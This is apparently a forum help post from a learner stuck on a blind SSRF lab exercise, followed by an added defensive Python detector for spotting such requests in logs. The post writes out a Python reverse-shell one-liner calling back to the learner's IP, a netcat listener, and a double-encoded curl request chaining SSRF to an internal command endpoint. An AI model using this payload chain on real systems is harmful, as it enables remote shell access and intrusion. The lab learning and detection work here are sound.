Hey, I’m trying to complete the Blind SSRF Exploitation Example, but I can’t create a reverse shell to my netcat. Btw, I’m using my local Kali machine, not Pwnbox, but on Pwnbox I’m having the same problem.
- I’ve twice encoded the Python reverse shell from the module.
Reverse shell before encoding:
export RHOST="10.10.15.192";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
- Run
netcat -nlvp 9999
- curl -i -s "http://10.129.41.183/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=python%2520-c%2520%2527import%2520sys%252Csocket%252Cos%252Cpty%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528os.getenv%2528%252210.10.15.192%2522%2529%252Cint%2528os.getenv%2528%25229999%2522%2529%2529%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cfd%2529%2520for%2520fd%2520in%2520%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fsh%2522%2529%2527"
- I’m getting this response (“URL can’t contain control characters”):
<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</h1><a>URL can't contain control characters. '/runme?x=python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'' (found at least ' ')</a></body></html>
and nothing happens.
Can anyone help me please?
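
Seen from the defending side, the request in this post has a recognisable shape in web server logs: a fetch URL nested inside another fetch URL, an internal destination, and more than one layer of percent-encoding. The following Python detector is an added example, not part of the original post or the module; the function names, finding labels, the `.local`/`.internal` suffix heuristic and the sample log entries are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

MAX_LAYERS = 5  # assumption: give up peeling after this many decode passes
# Characters http.client refuses in a request target (source of the error above).
CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")
# Tolerates repeated ':' and '/' after the scheme, as in the logged request.
URL_RE = re.compile(r"https?:+/+([^/?#:\s]+)", re.IGNORECASE)

def peel(value):
    """Percent-decode until the text stops changing; return (layers, text)."""
    layers = 0
    while layers < MAX_LAYERS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return layers, value

def is_internal(host):
    """True for loopback/private/link-local IPs and internal-looking names."""
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_loopback or ip.is_private or ip.is_link_local
    except ValueError:
        return host == "localhost" or host.endswith((".local", ".internal"))

def inspect(request_target):
    """Return the list of SSRF indicators found in one logged request target."""
    layers, text = peel(urlsplit(request_target).query)
    hosts = URL_RE.findall(text)
    findings = []
    if layers >= 2:
        findings.append("multi-layer-encoding")
    if len(hosts) >= 2:
        findings.append("nested-url")
    if any(is_internal(h.lower()) for h in hosts):
        findings.append("internal-destination")
    if hosts and CONTROL_RE.search(text):
        findings.append("control-chars-in-fetch-target")
    return findings

# Constructed log entries (benign payload text, hosts as in the post).
SAMPLES = [
    "/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=hello%2520world",
    "/load?q=http://example.com/logo.png",
    "/load?q=index.html",
]
```

Calling `inspect()` on each logged request target returns an empty list for ordinary loads and a list of indicator labels for requests shaped like the one above.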